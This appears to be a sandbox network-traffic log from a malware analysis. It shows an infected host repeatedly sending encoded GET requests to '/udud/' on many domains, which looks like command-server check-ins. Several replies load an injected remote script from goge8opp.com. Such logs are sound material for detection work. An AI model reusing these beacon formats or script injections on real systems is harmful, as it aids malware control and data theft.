                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 65 65 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 61 62 6c 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 25 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 72 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 64 20 73 74 79 6c 65 3d 22 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 3b 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 [TRUNCATED]
                                                                                                Data Ascii: <html> <head> <meta name="robots" content="noindex"> <title>404 Page Not Found.</title> </head> <body style="background-color:#eee;"> <table style="width:100%; height:100%;"> <tr> <td style="vertical-align: middle; text-align: center; font-family: sans-serif;"> <a href="http://tilda.cc"> <img src="http://tilda.ws/img/logo404.png" border="0" width="120" height="88" alt="Tilda" /> </a> <br> <br> <br> <br> <b>404 Page not found</b> </td> </tr> </table> </body></html>


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                86192.168.11.3049916162.209.189.15280
                                                                                                TimestampBytes transferredDirectionData
                                                                                                May 27, 2024 12:37:24.622390032 CEST192INHTTP/1.1 200 OK
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 96
                                                                                                Cache-Control: max-age=2592000
                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 67 6f 67 65 38 6f 70 70 2e 63 6f 6d 3a 33 30 31 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                Data Ascii: <html><body><script src="http://goge8opp.com:301" type="text/javascript"></script></body></html>


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                87192.168.11.3049917162.209.189.15280
                                                                                                TimestampBytes transferredDirectionData
                                                                                                May 27, 2024 12:37:27.314883947 CEST192INHTTP/1.1 200 OK
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 96
                                                                                                Cache-Control: max-age=2592000
                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 67 6f 67 65 38 6f 70 70 2e 63 6f 6d 3a 33 30 31 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                Data Ascii: <html><body><script src="http://goge8opp.com:301" type="text/javascript"></script></body></html>


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                88192.168.11.3049918162.209.189.15280
                                                                                                TimestampBytes transferredDirectionData
                                                                                                May 27, 2024 12:37:29.994443893 CEST192INHTTP/1.1 200 OK
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 96
                                                                                                Cache-Control: max-age=2592000
                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 67 6f 67 65 38 6f 70 70 2e 63 6f 6d 3a 33 30 31 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                Data Ascii: <html><body><script src="http://goge8opp.com:301" type="text/javascript"></script></body></html>


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                89192.168.11.3049919162.209.189.15280
                                                                                                TimestampBytes transferredDirectionData
                                                                                                May 27, 2024 12:37:32.682533979 CEST192INHTTP/1.1 200 OK
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 96
                                                                                                Cache-Control: max-age=2592000
                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 67 6f 67 65 38 6f 70 70 2e 63 6f 6d 3a 33 30 31 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                Data Ascii: <html><body><script src="http://goge8opp.com:301" type="text/javascript"></script></body></html>


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                90192.168.11.3049924208.112.85.15080
                                                                                                TimestampBytes transferredDirectionData
                                                                                                May 27, 2024 12:37:56.573240995 CEST481OUTGET /udud/?Pl9P8ldX=FIraThNO5niOHukbO1r8qSNysm+mJ2OOQaLhh3AktbepBJXcjCIQ5u+D5oIg7MUCVA/ZghdlXch7ulyeg4ZZkVaM25CfsdbY6Ciec8CSMOWGBD2e85VJ6eo=&UJ2H=ED2dW8S8UxwlG HTTP/1.1
                                                                                                Host: www.fivetownsjcc.com
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                May 27, 2024 12:37:56.689846992 CEST383INHTTP/1.1 404 Not Found
                                                                                                Date: Mon, 27 May 2024 10:37:36 GMT
                                                                                                Server: Apache
                                                                                                X-SERVER: 3908
                                                                                                Content-Length: 203
                                                                                                Connection: close
                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 64 75 64 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /udud/ was not found on this server.</p></body></html>


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                91192.168.11.304992579.98.25.180
                                                                                                TimestampBytes transferredDirectionData
                                                                                                May 27, 2024 12:38:01.911180019 CEST478OUTGET /udud/?Pl9P8ldX=+7vgIBjJEgFzVABnblxNZlxcXvtVnPO976cESSRxKNf7HePF9jiwkaXwYbYPT+M2gd9LCxRObe8L7kEVgXr7yG5qgAvgbam/iSwlpjMS4ArI2Mt4ChGP5d0=&UJ2H=ED2dW8S8UxwlG HTTP/1.1
                                                                                                Host: www.maxiwalls.com
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                May 27, 2024 12:38:02.120111942 CEST1289INHTTP/1.1 200 OK
                                                                                                Date: Mon, 27 May 2024 10:38:01 GMT
                                                                                                Server: Apache
                                                                                                Cache-control: max-age=300
                                                                                                Vary: Accept-Encoding
                                                                                                Content-Length: 5662
                                                                                                Connection: close
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 3c 68 65 61 64 3e 0d 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 38 30 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 30 30 35 63 61 33 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 69 74 65 6d 70 72 6f 70 3d 22 69 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 61 73 73 65 74 73 2e 69 76 2e 6c 74 2f 69 6d 61 67 65 73 2f 74 68 75 6d 62 6e 61 69 6c [TRUNCATED]
                                                                                                Data Ascii: <!doctype html><html> <head> <meta http-equiv="content-type" content="text/html; charset=utf-8"> <meta name="robots" content="noindex, nofollow"> <meta name="viewport" content="width=800, maximum-scale=1"> <meta name="theme-color" content="#005ca3"> <meta itemprop="image" content="https://assets.iv.lt/images/thumbnail.png"> <meta property="og:image" content="https://assets.iv.lt/images/thumbnail.png"> <link rel="icon" sizes="96x96" href="https://assets.iv.lt/images/icon.png"> <link rel="apple-touch-icon" href="https://assets.iv.lt/images/icon.png"> <link rel="stylesheet" type="text/css" href="https://assets.iv.lt/default.css"> <title>maxiwalls.com - Uregistruotas domenas - Interneto vizija</title> </head> <body>... begin header --> <table align=center cellpadding=0 cellspacing=0> <tr> <td> <iframe src="https://assets.iv.lt/header.html" width=768 height=100 scrolling=no frameborder=0></iframe> </td> </tr> <tr><td height=2 [TRUNCATED]
                                                                                                May 27, 2024 12:38:02.120234013 CEST1289INData Raw: 0a 20 20 3c 74 61 62 6c 65 20 77 69 64 74 68 3d 37 36 38 20 61 6c 69 67 6e 3d 63 65 6e 74 65 72 20 63 65 6c 6c 70 61 64 64 69 6e 67 3d 30 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 30 3e 0d 0a 20 20 20 3c 74 72 3e 0d 0a 20 20 20 20 3c 74 64 3e 0d 0a
                                                                                                Data Ascii: <table width=768 align=center cellpadding=0 cellspacing=0> <tr> <td> <h1>maxiwalls.com</h1> <p> </td> </tr> <tr valign=top> <td width=508> Domenas <b>maxiwalls.com</b> skmingai uregistruotas
                                                                                                May 27, 2024 12:38:02.120347023 CEST1289INData Raw: c4 97 6d c4 97 2c 20 6b 61 64 20 c5 a1 69 61 6e 64 69 65 6e 20 70 61 73 20 6d 75 73 20 73 61 76 6f 20 69 6e 74 65 72 6e 65 74 6f 20 73 76 65 74 61 69 6e 65 73 20 74 61 6c 70 69 6e 61 20 69 72 20 6d 75 6d 69 73 20 70 61 73 69 74 69 6b 69 20 64 61
                                                                                                Data Ascii: m, kad iandien pas mus savo interneto svetaines talpina ir mumis pasitiki daugiausiai alies gyventoj. <p> <table class=table> <tr> <th></th> <th>Patui</th> <th>Svetainei</th> <th>U
                                                                                                May 27, 2024 12:38:02.120471954 CEST1289INData Raw: 20 20 3c 74 64 3e 2b 3c 2f 74 64 3e 0d 0a 20 20 20 20 20 20 20 3c 74 64 3e 2b 3c 2f 74 64 3e 0d 0a 20 20 20 20 20 20 3c 2f 74 72 3e 0d 0a 20 20 20 20 20 20 3c 74 72 20 61 6c 69 67 6e 3d 63 65 6e 74 65 72 3e 0d 0a 20 20 20 20 20 20 20 3c 74 64 20
                                                                                                Data Ascii: <td>+</td> <td>+</td> </tr> <tr align=center> <td align=left>Reseller</td> <td>-</td> <td>-</td> <td>-</td> <td>+</td> </tr> <tr align=center> <td align=left
                                                                                                May 27, 2024 12:38:02.120626926 CEST710INData Raw: 6c 69 3e 3c 61 20 74 61 72 67 65 74 3d 5f 74 6f 70 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 69 76 2e 6c 74 2f 70 72 6f 66 65 73 69 6f 6e 61 6c 75 73 2d 68 6f 73 74 69 6e 67 61 73 2f 22 3e 50 72 6f 66 65 73 69 6f 6e 61 6c 75 73 20
                                                                                                Data Ascii: li><a target=_top href="https://www.iv.lt/profesionalus-hostingas/">Profesionalus hostingas</a> <li><a target=_top href="https://www.iv.lt/vps-serveriai/">Serveri nuoma</a> <li><a target=_top href="https://www.iv.lt/sertifikata


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                92192.168.11.304992664.190.62.2280
                                                                                                TimestampBytes transferredDirectionData
                                                                                                May 27, 2024 12:38:07.328663111 CEST486OUTGET /udud/?Pl9P8ldX=TI4e2mgRGjDzVtc2Q6Py5bwpcc1eb12gZ0duId/eBRBY8c2YNmrJo+kJDCAf1WNWS12prRY8Wfa6UPEwF5qWDHqXkvXCbknW9nAX9azEcXWIpZdV+y5+rBk=&UJ2H=ED2dW8S8UxwlG HTTP/1.1
                                                                                                Host: www.donantedeovulos.space
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                May 27, 2024 12:38:07.555200100 CEST1289INHTTP/1.1 200 OK
                                                                                                date: Mon, 27 May 2024 10:38:07 GMT
                                                                                                content-type: text/html; charset=UTF-8
                                                                                                transfer-encoding: chunked
                                                                                                vary: Accept-Encoding
                                                                                                x-powered-by: PHP/8.1.17
                                                                                                expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                pragma: no-cache
                                                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_bZQwM6rcoDWKKpVAXhX2tlV84V3PyO17BuINdDXE3PQlpZg9Kg6Hnhi5jqSBqYmWFVUdTNJQtasOr6lulaA+uQ==
                                                                                                last-modified: Mon, 27 May 2024 10:38:07 GMT
                                                                                                x-cache-miss-from: parking-54698f55d6-q2vkw
                                                                                                server: NginX
                                                                                                connection: close
                                                                                                Data Raw: 32 43 45 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 62 5a 51 77 4d 36 72 63 6f 44 57 4b 4b 70 56 41 58 68 58 32 74 6c 56 38 34 56 33 50 79 4f 31 37 42 75 49 4e 64 44 58 45 33 50 51 6c 70 5a 67 39 4b 67 36 48 6e 68 69 35 6a 71 53 42 71 59 6d 57 46 56 55 64 54 4e 4a 51 74 61 73 4f 72 36 6c 75 6c 61 41 2b 75 51 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 64 6f 6e 61 6e 74 65 64 65 6f 76 75 6c 6f 73 2e 73 70 61 63 65 26 6e 62 73 70 3b 2d 26 6e 62 73 [TRUNCATED]
                                                                                                Data Ascii: 2CE<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_bZQwM6rcoDWKKpVAXhX2tlV84V3PyO17BuINdDXE3PQlpZg9Kg6Hnhi5jqSBqYmWFVUdTNJQtasOr6lulaA+uQ==><head><meta charset="utf-8"><title>donantedeovulos.space&nbsp;-&nbsp;donantedeovulos Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="donantedeovulos.space is your first and best source for all of the information youre looki
                                                                                                May 27, 2024 12:38:07.555274010 CEST1289INData Raw: 6e 67 20 66 6f 72 2e 20 46 72 6f 6d 20 67 65 6e 65 72 61 6c 20 74 6f 70 69 63 73 20 74 6f 20 6d 6f 72 65 20 6f 66 20 77 68 61 74 20 79 6f 75 20 77 6f 75 6c 64 20 65 78 70 65 63 74 20 74 6f 20 66 69 6e 64 20 68 65 72 65 2c 20 64 6f 6e 61 6e 74 65
                                                                                                Data Ascii: ng for. From general topics to more of what you would expect to find here, donantedeovulos.space has it1062 all. We hope you find what you are searching for!"><link rel="icon" type="image/png" href="//img.sedoparkin
                                                                                                May 27, 2024 12:38:07.555304050 CEST1289INData Raw: 72 6f 6f 74 29 7b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 62 75 74 74 6f 6e 2c 69 6e 70 75 74 2c 6f 70 74 67 72 6f 75 70 2c 73 65 6c 65 63 74 2c 74 65 78 74 61 72 65 61 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66
                                                                                                Data Ascii: root){overflow:hidden}button,input,optgroup,select,textarea{font-family:sans-serif;font-size:100%;line-height:1.15;margin:0}button,input{overflow:visible}button,select{text-transform:none}button,html [type=button],[type=reset],[type=submit]{-w
                                                                                                May 27, 2024 12:38:07.555393934 CEST1289INData Raw: 6e 6e 6f 75 6e 63 65 6d 65 6e 74 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 32 37 33 39 34 38 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 70 61 64 64 69 6e 67 3a 30 20 35 70 78 7d 2e 61 6e 6e 6f 75 6e 63 65 6d 65 6e 74 20 70 7b 63 6f 6c
                                                                                                Data Ascii: nnouncement{background:#273948;text-align:center;padding:0 5px}.announcement p{color:#848484}.announcement a{color:#848484}.container-header{margin:0 auto 0 auto;text-align:center}.container-header__content{color:#848484}.container-buybox{text
                                                                                                May 27, 2024 12:38:07.555531979 CEST1289INData Raw: 70 72 69 6e 74 5f 5f 63 6f 6e 74 65 6e 74 2d 74 65 78 74 2c 2e 63 6f 6e 74 61 69 6e 65 72 2d 69 6d 70 72 69 6e 74 5f 5f 63 6f 6e 74 65 6e 74 2d 6c 69 6e 6b 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 70 78 3b 63 6f 6c 6f 72 3a 23 39 34 39 34 39 34 7d
                                                                                                Data Ascii: print__content-text,.container-imprint__content-link{font-size:10px;color:#949494}.container-contact-us{text-align:center}.container-contact-us__content{display:inline-block}.container-contact-us__content-text,.container-contact-us__content-li
                                                                                                May 27, 2024 12:38:07.555627108 CEST1289INData Raw: 3b 2d 6d 6f 7a 2d 74 72 61 6e 73 69 74 69 6f 6e 3a 61 6c 6c 20 2e 33 73 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 61 6c 6c 20 2e 33 73 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6f 6b 69 65 2d 6d 6f 64 61 6c 2d 77 69 6e 64 6f 77
                                                                                                Data Ascii: ;-moz-transition:all .3s;transition:all .3s;text-align:center}.cookie-modal-window__content-header{font-size:150%;margin:0 0 15px}.cookie-modal-window__content{text-align:initial;margin:10% auto;padding:40px;background:#fff;display:inline-bloc
                                                                                                May 27, 2024 12:38:07.555689096 CEST672INData Raw: 63 38 33 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 37 32 37 63 38 33 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 6d 65 64 69 75 6d 7d 2e 62 74 6e 2d 2d 73 65 63 6f 6e 64 61 72 79 2d 73 6d 7b 62 61 63 6b 67 72 6f 75 6e 64
                                                                                                Data Ascii: c83;border-color:#727c83;color:#fff;font-size:medium}.btn--secondary-sm{background-color:#8c959c;border-color:#8c959c;color:#fff;font-size:initial}.btn--secondary-sm:hover{background-color:#727c83;border-color:#727c83;color:#fff;font-size:init
                                                                                                May 27, 2024 12:38:07.555788994 CEST1289INData Raw: 31 35 44 38 0d 0a 2d 2d 72 6f 75 6e 64 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 33 34 70 78 7d 2e 73 77 69 74 63 68 5f 5f 73 6c 69 64 65 72 2d 2d 72 6f 75 6e 64 3a 62 65 66 6f 72 65 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 30 25 7d 69
                                                                                                Data Ascii: 15D8--round{border-radius:34px}.switch__slider--round:before{border-radius:50%}input:checked+.switch__slider{background-color:#007bff}input:focus+.switch__slider{box-shadow:0 0 1px #007bff}input:checked+.switch__slider:before{-webkit-transfo
                                                                                                May 27, 2024 12:38:07.555815935 CEST1289INData Raw: 6e 64 65 78 3a 2d 31 3b 74 6f 70 3a 2d 33 30 30 70 78 3b 6c 65 66 74 3a 2d 35 30 70 78 3b 68 65 69 67 68 74 3a 31 33 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 69 6e 68 65 72 69 74 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 5f 5f 72
                                                                                                Data Ascii: ndex:-1;top:-300px;left:-50px;height:1300px;position:inherit}.container-content__right{background:url("//img.sedoparking.com/templates/bg/multi-arrows.png") #273948 no-repeat center top;background-size:95% 2940px;flex-grow:2;-moz-transform:sca
                                                                                                May 27, 2024 12:38:07.555875063 CEST1289INData Raw: 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 3b 63 6f 6c 6f 72 3a 23 39 66 64 38 30 31 7d 2e 74 77 6f 2d 74 69 65 72 2d 61 64 73 2d 6c 69 73 74 5f 5f 6c 69 73 74 2d 65
                                                                                                Data Ascii: ont-weight:bold;text-decoration:underline;color:#9fd801}.two-tier-ads-list__list-element-text{padding:3px 0 6px 0;margin:.11em 0;line-height:18px;color:#fff}.two-tier-ads-list__list-element-link{font-size:1em;text-decoration:underline;color:#9
                                                                                                May 27, 2024 12:38:07.745125055 CEST1289INData Raw: 6e 63 79 22 3a 22 22 2c 22 61 64 75 6c 74 46 6c 61 67 22 3a 66 61 6c 73 65 2c 22 70 75 22 3a 22 2f 2f 77 77 77 2e 64 6f 6e 61 6e 74 65 64 65 6f 76 75 6c 6f 73 2e 73 70 61 63 65 22 2c 22 64 6e 73 68 22 3a 74 72 75 65 2c 22 64 70 73 68 22 3a 66 61
                                                                                                Data Ascii: ncy":"","adultFlag":false,"pu":"//www.donantedeovulos.space","dnsh":true,"dpsh":false,"toSell":false,"cdnHost":"img.sedoparking.com","adblockkey":" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RX


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                93192.168.11.30499273.73.27.10880
                                                                                                TimestampBytes transferredDirectionData
                                                                                                May 27, 2024 12:38:12.948900938 CEST485OUTGET /udud/?Pl9P8ldX=hGFabcFIFCLvltCtmr9HP7OROVYI8jz1wRRIKEqq2n4QXlxpqgeqG0CRvdN+pVKSvdVheptlxRG17ghg7M8WhiuOrvxilzcVqEvqLqvxpfLmNTwCuTHyXsI=&UJ2H=ED2dW8S8UxwlG HTTP/1.1
                                                                                                Host: www.valentinaetommaso.it
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                May 27, 2024 12:38:13.184134007 CEST1289INHTTP/1.1 404 Not Found
                                                                                                Server: openresty
                                                                                                Date: Mon, 27 May 2024 10:38:13 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Set-Cookie: PHPSESSID=1vdklb6ta12o9p8t3rtq5b1n4n; path=/; domain=valentinaetommaso.it; HttpOnly
                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                Pragma: no-cache
                                                                                                Data Raw: 61 31 34 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 20 6c 61 6e 67 3d 22 69 74 22 3e 0a 3c 68 65 61 64 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 31 64 69 32 6c 7a 75 68 39 37 66 68 32 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 31 64 69 32 6c 7a 75 68 39 37 66 68 32 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 66 69 6c 65 73 2f 32 64 2f 32 64 69 2f 32 64 69 [TRUNCATED]
